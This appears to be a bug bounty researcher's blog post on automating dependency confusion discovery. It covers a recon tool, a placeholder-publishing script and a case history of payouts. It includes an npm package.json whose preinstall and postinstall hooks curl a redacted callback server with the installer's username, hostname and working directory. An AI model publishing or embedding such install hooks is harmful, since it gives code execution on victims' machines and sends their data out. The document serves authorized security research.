
Turning Dependency Confusion Research into a Profitable Stack


“The easiest way to get started is to find some promising research by someone else, build on it by mixing in other techniques, then apply your new approach to some live targets to see if anything interesting happens” — James Kettle, Director of Research at PortSwigger.

This philosophy was the blueprint for my deep dive into Dependency Confusion vulnerabilities. Starting with zero prior knowledge, I didn’t invent a new attack; I operationalized a known one. This article details my journey from foundational learning to building a custom automation framework for this bug class. I will disclose how I leveraged tooling to systematically exploit targets where manual testing was prohibitive, ultimately leading to multiple successful reports and earnings exceeding five figures.

The Beginning

When I started learning about Dependency Confusion, I researched all available resources. While I found a wealth of information, most blogs and tools felt incomplete. They often provided a single approach or a static snapshot of the vulnerability that was hard to scale or fully operationalize. I felt like I was always missing the crucial piece that allowed for mass success.

That changed when I found the seminal works that truly connected the dots for me.

I began linking everything I had read to build the big picture. Instead of focusing on a single, manual approach, I set about applying those techniques at a massive, industrial scale. This led directly to developing a custom tool, my personal attempt to prove James Kettle’s philosophy: to automate what others had only published.

What is Dependency Confusion and How it Works

Dependency Confusion is a software supply chain attack that exploits the way package managers (like npm, pip, or gem) resolve names for dependencies.

The Mechanism

Package managers typically check two locations when installing dependencies: a private, internal registry and a public registry. The “confusion” happens when the package manager checks the public registry first, or queries both concurrently and prioritizes the highest version number it finds, regardless of the source.

  1. Recon: The attacker scans public code (e.g., GitHub, JS files) and finds a private, internal package name (e.g., acme-analytics).

  2. Injection: The attacker registers a malicious package named acme-analytics on the public registry (e.g., npm) and assigns it a higher version number (e.g., 99.9.9) than the internal package (e.g., 1.0.0).

  3. Installation: When a developer runs their build command, the package manager downloads the public 99.9.9 package instead of the legitimate internal one. The system is confused about which package is the "correct" one.
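The flawed resolution logic behind those three steps can be sketched as a toy resolver. This is purely illustrative: the registries, package name, and versions below are made up, and real package managers are far more involved.

```python
# Toy sketch of the flawed resolution logic behind Dependency Confusion.
# All registries, names, and versions are illustrative, not real data.

def parse_version(v):
    """Turn '1.0.0' into a comparable tuple (1, 0, 0)."""
    return tuple(int(part) for part in v.split("."))

def resolve(name, internal_registry, public_registry):
    """Naive resolver: consult both registries, keep the highest version."""
    candidates = []
    if name in internal_registry:
        candidates.append(("internal", internal_registry[name]))
    if name in public_registry:
        candidates.append(("public", public_registry[name]))
    # The confusion: the highest version wins, regardless of source.
    return max(candidates, key=lambda c: parse_version(c[1]))

internal = {"acme-analytics": "1.0.0"}   # the legitimate private package
public = {"acme-analytics": "99.9.9"}    # the attacker's planted package

source, version = resolve("acme-analytics", internal, public)
print(source, version)  # the planted public 99.9.9 shadows the internal 1.0.0
```

The single `max(...)` line is the entire vulnerability class: nothing in the resolution step distinguishes a trusted source from an untrusted one.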

Where to Find the Clues

The key to finding these vulnerabilities is locating the names of private packages: scan for package names that are referenced in configuration files but are not available on any public package registry.

  • Source Code (e.g., GitHub): Scanning for files like package.json, setup.py, or Gemfile.

  • JS Files: In-browser JavaScript bundles often expose the names of internal components.

  • Ecosystems: The vulnerability applies to any ecosystem with a split public/private registry, including npm (Node.js), pip (Python), RubyGems (Ruby), and more.
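As a minimal illustration of the first clue source, dependency names can be pulled out of a `package.json` with nothing but the standard library. The manifest and the "known public" set below are fabricated for the sketch; a real scan would query the registry for every extracted name instead.

```python
import json

# A fabricated manifest of the kind you might find in a public repo.
manifest = json.loads("""
{
  "name": "acme-dashboard",
  "dependencies": {
    "react": "^18.2.0",
    "acme-analytics": "^1.0.0",
    "acme-internal-auth": "^2.1.0"
  }
}
""")

# In a real scan each name is checked against the public registry;
# here a hardcoded set stands in for "already exists on npm".
known_public = {"react"}

candidates = [
    name for name in manifest["dependencies"]
    if name not in known_public
]
print(candidates)  # names worth cross-checking against the registry
```

The same idea extends to `setup.py`, `requirements.txt`, and `Gemfile`; only the parsing step changes per ecosystem.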

Building the Custom Automation Engine

As someone who doesn’t enjoy writing extensive boilerplate, my first strategic decision was to leverage an augmented coding tool. I used Augmentcode, which proved instrumental in translating my high-level idea from theory into a functional tool with high-quality code.

Leveraging HAR Files

My automation needed to be smarter than simply grepping GitHub. My inspiration for tackling package name extraction from live websites came directly from the Lupin blog on the Netflix vulnerability, which highlighted the power of HAR files.

A HAR file is a JSON log that captures every HTTP interaction during a web session. The technique involves a sophisticated Reconnaissance Pipeline:

  1. Generate HAR Files: Use a headless browser (like Playwright) to capture all network traffic when loading a target domain.

  2. Advanced Parsing: Instead of relying on fragile regex, the collected JavaScript is fed into a proper Abstract Syntax Tree (AST) parser. This is crucial because AST parsing understands code structure, allowing it to catch dynamic imports and obfuscated variables that simple text scraping misses.

  3. Extract and Cross-Reference: The parser emits a clean list of candidate package identifiers, which are then cross-referenced against public package registries to find unclaimed names or those with lower internal versions.

By chaining these steps, I converted the “ocean of network noise” into a clean shortlist of high-confidence leads.
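In miniature, the HAR plumbing looks like this. The HAR below is a fabricated two-line stub, and a crude regex over import/require specifiers stands in for the AST parser the real pipeline uses, purely to keep the sketch self-contained.

```python
import json
import re

# A tiny, fabricated HAR: real files hold every request/response of a session.
har = json.loads("""
{
  "log": {
    "entries": [
      {
        "response": {
          "content": {
            "mimeType": "application/javascript",
            "text": "import a from 'acme-analytics'; const b = require(\\"acme-internal-auth\\");"
          }
        }
      }
    ]
  }
}
""")

# Step 1: collect the bodies of JavaScript responses only.
js_bodies = [
    e["response"]["content"].get("text", "")
    for e in har["log"]["entries"]
    if "javascript" in e["response"]["content"].get("mimeType", "")
]

# Step 2: extract candidate package specifiers. The real tool feeds the
# bodies to an AST parser; this regex is a stand-in for illustration.
spec = re.compile(r"""(?:import[^'"]*|require\()\s*['"]([^'"]+)['"]""")
packages = sorted({m for body in js_bodies for m in spec.findall(body)})
print(packages)
```

Step 3, cross-referencing each extracted name against the public registries, is a straightforward HTTP lookup per name and is omitted here.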

From Simple Theory to Full-Stack Automation

My initial theory — a simple GitHub script — quickly exploded into a full-stack Dependency Confusion tooling suite named depconf.

Inputs and key features:

  • GitHub Orgs: Targeted deep-scan of repository files (e.g., package.json, requirements.txt).

  • Websites/Domains: Fast scanning of domains and subdomains for exposed package names in compiled JavaScript (JS) files.

  • Local Files: Ability to analyze local code dumps (e.g., massive .js files).

  • Multi-Ecosystem Support: Built-in logic to handle the nuances of npm, pip, gem, and other package managers.

The inspiration for this comprehensive, integrated framework was Lupin’s original depi tool. I realized that for maximum profit and efficiency, I couldn't rely on fragmented scripts; I needed an integrated engine.

Fueling the Machine

Building the tool was just the first phase; the next was turning it into a 24/7 automated money-finding engine. To truly scale and apply Kettle’s philosophy, I needed to automate the target acquisition and continuous scanning.


I adopted a “set-it-and-forget-it” approach:

  • The Engine Room: I purchased a powerful VPS to serve as the dedicated, 24/7 host for my automation suite.

  • Continuous Target Acquisition: I used screen to manage multiple simultaneous terminal sessions, each dedicated to a different set of targets.

  • The Target Stream: To constantly fuel the machine, I utilized the bbscope tool to fetch all domains and subdomains from my bug bounty programs. After collecting the initial domains, I performed deep subdomain enumeration to maximize the potential attack surface.

The VPS ran my tool, depconf, in a relentless loop across all collected domains. The core command I ran in each screen instance was:

# This command is placed inside a continuous loop
python3 -m depconf --config depconf_config.yaml --enable-notifications har domains.txt

This command instructed the tool to process targets, perform the Dependency Confusion scan, and, crucially, if a potential vulnerability was found, the --enable-notifications flag would trigger a detailed alert directly to a dedicated Discord channel. This alert included the vulnerable subdomain and the specific JS file where the private package name was discovered.

The Human-in-the-Loop

While the machine handled the reconnaissance and initial discovery, the final, high-value step remained manual:

  • Manual Verification: I would manually review the JS file shared via the Discord notification.

  • PoC Development: If confirmed, I would quickly write a Proof of Concept payload.

  • Publication: I would publish the malicious package to the corresponding public registry (e.g., npm) to verify the Dependency Confusion attack.

  • The Callback: Waiting for the callback confirmed the vulnerability, at which point I immediately drafted the report.

PoC and Success Stories

The most common questions I get are: How do you publish packages on npm without deletion? How do you get the callbacks? How do you manage to find if the callbacks belong to a customer or not?

This relies on a two-stage publishing strategy and meticulous callback management.

The Benign Placeholder

The critical first step is to publish a benign package as a placeholder immediately upon discovery of an unpublished internal name. This prevents other attackers or researchers from claiming the name first.

Here is the simple script that performs this automated initial publication:

PACKAGE_NAME="[REDACTED_PACKAGE_NAME]" && \
mkdir "$PACKAGE_NAME" && \
cat <<EOF > "$PACKAGE_NAME/package.json"
{
  "name": "$PACKAGE_NAME",
  "version": "1.0.0",
  "description": "A simple, benign placeholder for npm.",
  "main": "index.js",
  "scripts": {
    "preinstall": "",
    "postinstall": ""
  },
  "keywords": [],
  "author": "anonymous",
  "license": "ISC"
}
EOF
echo '// This is a benign placeholder for a Node.js package.' > "$PACKAGE_NAME/index.js" && \
cd "$PACKAGE_NAME" && \
npm publish --access public && \
cd ..

This script creates a package with a generic version (1.0.0) and empty install scripts, so it is completely harmless. I automated this process to publish dozens of placeholders quickly.

The Callback Payload

After a minimum of 24 hours (to ensure the name is reserved), I update the package with the actual PoC payload, significantly incrementing the version number (e.g., to 99.99.1).

The essential change is within the scripts block:

{
  "name": "[REDACTED_PACKAGE_NAME]",
  "version": "99.99.1",
  // ...
  "scripts": {
    "preinstall": "curl -s \"http://[REDACTED_SERVER_URL]/depconf/[PACKAGE_NAME]/?u=$(whoami)&h=$(hostname)&d=$PWD&t=$(date +%s)\" > /dev/null || true",
    "postinstall": "curl -s \"http://[REDACTED_SERVER_URL]/depconf/[PACKAGE_NAME]/?u=$(whoami)&h=$(hostname)&d=$PWD&t=$(date +%s)\" > /dev/null || true"
  },
  "keywords": [],
  "author": "anonymous",
  "license": "ISC"
}

The payload leverages the preinstall and postinstall hooks. When the victim's package manager installs this version, it executes the curl command, sending a request to my controlled web server. The data captured (username, hostname, current directory) provides irrefutable proof of RCE.

To manage the high volume of potential callbacks, I used a real-time NGINX log filter piped into Project Discovery’s notify tool:

sudo tail -F /var/log/nginx/access.log | grep --line-buffered '/depconf/' | notify -p discord -silent

This sends the filtered log line, containing the full callback data, directly to my dedicated Discord channel for immediate triage.
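Each callback line carries the exfiltrated fields in its query string, so triage takes only a few lines of standard-library Python. The access-log line below is fabricated to match the shape the payload produces.

```python
from urllib.parse import urlsplit, parse_qs

# A fabricated NGINX access-log line of the shape the callback produces.
log_line = (
    '203.0.113.7 - - [01/Jan/2024:12:00:00 +0000] '
    '"GET /depconf/some-package/?u=builduser&h=ci-runner-3&d=/builds/app&t=1704110400 HTTP/1.1" 200 0'
)

# Pull the quoted request out of the log line, then parse its query string.
request = log_line.split('"')[1]          # 'GET /depconf/... HTTP/1.1'
path = request.split()[1]
params = {k: v[0] for k, v in parse_qs(urlsplit(path).query).items()}
source_ip = log_line.split()[0]

# Username, hostname, and working directory of the machine that installed
# the package, plus the source IP used for the validation step below.
print(source_ip, params["u"], params["h"], params["d"])
```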

The most crucial step is validating that the callback is not a false positive from an automated security scanner. This is done by analyzing the source IP address of the callback.

I use the ARIN RDAP lookup service to check the IP address: https://search.arin.net/rdap/?query=[IP_ADDRESS].

  • Ignore: If the IP belongs to Google Cloud, AWS, or a known public scanner, it is ignored.

  • High Confidence: If the IP belongs to the target company’s dedicated ASN or a commercial ISP in their geographic location, it is a high-confidence hit, indicating a developer’s machine or a build server has installed the malicious package.
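The triage rule above can be encoded as a small filter over the org name an RDAP lookup returns. The org strings and the deny-list here are illustrative placeholders; in practice each source IP is looked up against ARIN's RDAP service first and the returned organization is fed into a filter like this.

```python
# Illustrative triage of callback source IPs by RDAP org name.
# The org names and deny-list below are made up for the sketch.

CLOUD_AND_SCANNER_ORGS = {"google", "amazon", "microsoft", "digitalocean"}

def classify(org_name, target_org):
    org = org_name.lower()
    if any(cloud in org for cloud in CLOUD_AND_SCANNER_ORGS):
        return "ignore"               # likely an automated public scanner
    if target_org.lower() in org:
        return "high-confidence"      # the target's own ASN: a real hit
    return "review"                   # e.g. a commercial ISP: verify manually

print(classify("Amazon Technologies Inc.", "Acme"))   # ignore
print(classify("Acme Corp Network Ops", "Acme"))      # high-confidence
print(classify("Swisscom AG", "Acme"))                # review
```

The "review" bucket matters: a commercial ISP in the target's geographic region often turns out to be a developer's workstation, which is exactly the high-confidence evidence a report needs.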

This final verification step turns a simple server log into a validated, high-value bug bounty report.

Some Success Stories

Elementor Bug Bounty Program

My depconf tool's GitHub reconnaissance module was fully operational when I targeted the Elementor bug bounty program on Bugcrowd. I fed depconf all GitHub organizations associated with the program. The tool rapidly scanned their repositories, identifying a crucial package name used internally but completely unregistered on npm. Following my two-stage PoC strategy, I immediately claimed the name and then published the callback payload. Within a short period, I received a legitimate callback from an internal Elementor server, confirming a P1-impact Dependency Confusion vulnerability.

Private Bug Bounty Program at HackerOne

On a private bug bounty program at HackerOne, my depconf tool, using its HAR scanning capabilities, identified a critical internal package name exposed in their JavaScript files. I initiated my two-stage PoC, but made a crucial mistake: I reported the finding prematurely, before receiving a confirmed callback from the target. The report was initially closed as Informative. Three days later, the genuine callback arrived. Thanks to triager “Kirk,” the report was reopened, the vulnerability was confirmed by the customer, and a payout followed within a week.

Swiss Bug Bounty Program

My automated depconf engine proved its versatility and profitability across a single, high-value Swiss bug bounty program, yielding three separate reports (two Critical, one High). But the most exhilarating discovery, and a highlight of my research, came from an Android application.

While scanning the program, my tool’s capability to analyze assets within Android APK files flagged a critical finding. I unpacked the APK, performed static analysis on its bundled JavaScript using depconf, and swiftly identified an unscoped internal package. A public registry check confirmed it was entirely unclaimed. I executed my standard two-stage PoC, publishing the high-version payload. Within minutes, callbacks flooded in, confirming Remote Code Execution inside multiple build environments. This RCE was classified as Critical, demonstrating potential for credential theft and source code exfiltration.

This experience unequivocally validated the effectiveness of automated research methodologies on diverse target types, including mobile applications, and capped off a highly successful run on that program.

Key Takeaways for Your Hacking Journey

  • Iterate, Don’t Invent: Focus your energy on automating and refining existing, published research.

  • Infrastructure is King: A reliable 24/7 VPS and automated target feeding (bbscope) is what converts a small script into a discovery machine.

  • The Placeholder Strategy is Essential: Always reserve the package name immediately to protect your finding from other researchers.

  • Validate Your Callbacks: The ARIN lookup is the final, crucial step that distinguishes noise from a reportable, high-value vulnerability.

My Journey: Beyond the Code

So, if there’s one thing I hope you take away from this, it’s this: Don’t wait for a flash of genius. Look at the brilliant work already out there. Ask yourself, “Can I automate this? Can I scale this?” The answers might just surprise you, and they might just lead you to your own five-figure success story.

Happy hunting, and FREE PALESTINE!🇵🇸